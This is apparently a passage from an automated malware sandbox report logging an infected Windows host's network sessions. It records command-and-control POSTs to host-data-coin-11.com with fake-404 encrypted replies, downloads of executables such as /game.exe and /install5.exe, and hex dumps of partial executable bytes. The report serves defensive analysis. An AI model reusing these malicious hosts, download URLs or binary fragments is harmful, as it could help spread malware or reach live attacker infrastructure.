00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8d 44 24 08 50 8b f1 e8 d9 11 00 00 c7 06 30 32 41 00 8b c6 5e c2 04 00 c7 01 30 32 41 00 e9 8f 12 00 00 56 8b f1 c7 06 30 32 41 00 e8 81 12 00 00 f6 44 24
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2tvivivihGiihGihG[iQqivhihGwihGwihGwiRichviPELb_-0@ eP2 Y@0.text `.rdataD?0@"@@.dataXp$b@.rsrc@@VD$P02A^02AV02AD$


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549868172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  20192.168.2.5497825.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:10.125879049 CET8639OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ognflovg.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 158
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:10.246994972 CET8640INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:10 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  21192.168.2.5497835.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:10.375132084 CET8642OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vwwgouyyu.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 349
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:10.501724958 CET8650INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:10 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  22192.168.2.5497865.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:10.963964939 CET9173OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ljpmlskjw.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 272
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:11.082431078 CET9174INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:11 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 37I:82OR%@_M-\z.TKC0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  23192.168.2.5497885.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:11.311721087 CET9180OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hgdqpo.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 172
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:11.440588951 CET10207INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:11 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 46I:82OOjpYJRg%XQAc}yc0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  24192.168.2.5497905.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:15.881884098 CET12062OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ewfecsg.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 117
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:16.007107019 CET12062INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:15 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 2eI:82OO~kEKg2P0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  25192.168.2.54979154.38.220.8580C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:16.053000927 CET12063OUTGET /install5.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: unicupload.top
                                                                                                                                  Jan 11, 2022 23:38:16.070962906 CET12063INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                  Date: Tue, 11 Jan 2022 22:36:58 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 178
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  26192.168.2.5497925.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:16.162940025 CET12064OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dtnpcii.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 250
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:16.280215025 CET12065INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:16 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  27192.168.2.5497935.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:16.389791965 CET12066OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://kbycni.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 241
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:16.506001949 CET12066INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:16 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  28192.168.2.5497945.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:16.608599901 CET12067OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wuweqcxcm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 151
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:16.731704950 CET12068INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:16 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  29192.168.2.5497955.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:16.877801895 CET12069OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gvaoyk.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 257
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:17.002197027 CET12070INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:16 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 30I:82OR&:UPJ$dP0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549871172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  30192.168.2.5497965.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:17.161552906 CET12070OUTGET /game.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: data-host-coin-8.com
                                                                                                                                  Jan 11, 2022 23:38:17.267962933 CET12072INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:17 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 312832
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Tue, 11 Jan 2022 22:38:01 GMT
                                                                                                                                  ETag: "4c600-5d5561b176618"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f5 92 3d 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 18 01 00 00 2a 04 00 00 00 00 00 07 2f 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 9f 6f 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 5e 01 00 50 00 00 00 00 80 04 00 50 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 51 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 53 16 01 00 00 10 00 00 00 18 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 37 00 00 00 30 01 00 00 38 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 04 03 00 00 70 01 00 00 a4 02 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 cd 00 00 00 80 04 00 00 ce 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 20 32 41 00 e9 3a 11 00 00 56 8b f1 c7 06 20 32 41 00 e8 2c 11 00 00 f6 44 24 08 01 74 07 56 e8 b9 14 00 00 59 8b c6 5e c2 04 00 55 8b ec ff 75 14 ff 75
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$~---{--m--j--@----d--z----Rich-PEL=_*/0@Po(^PP1Q@0.textS `.rdata708@@.data8pT@.rsrcP@@ 2A:V 2A,D$tVY^Uuu


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  31192.168.2.5498015.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:19.550937891 CET16323OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://isitf.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 129
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:19.668948889 CET16324INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:19 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  32192.168.2.5498025.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:20.071821928 CET16325OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
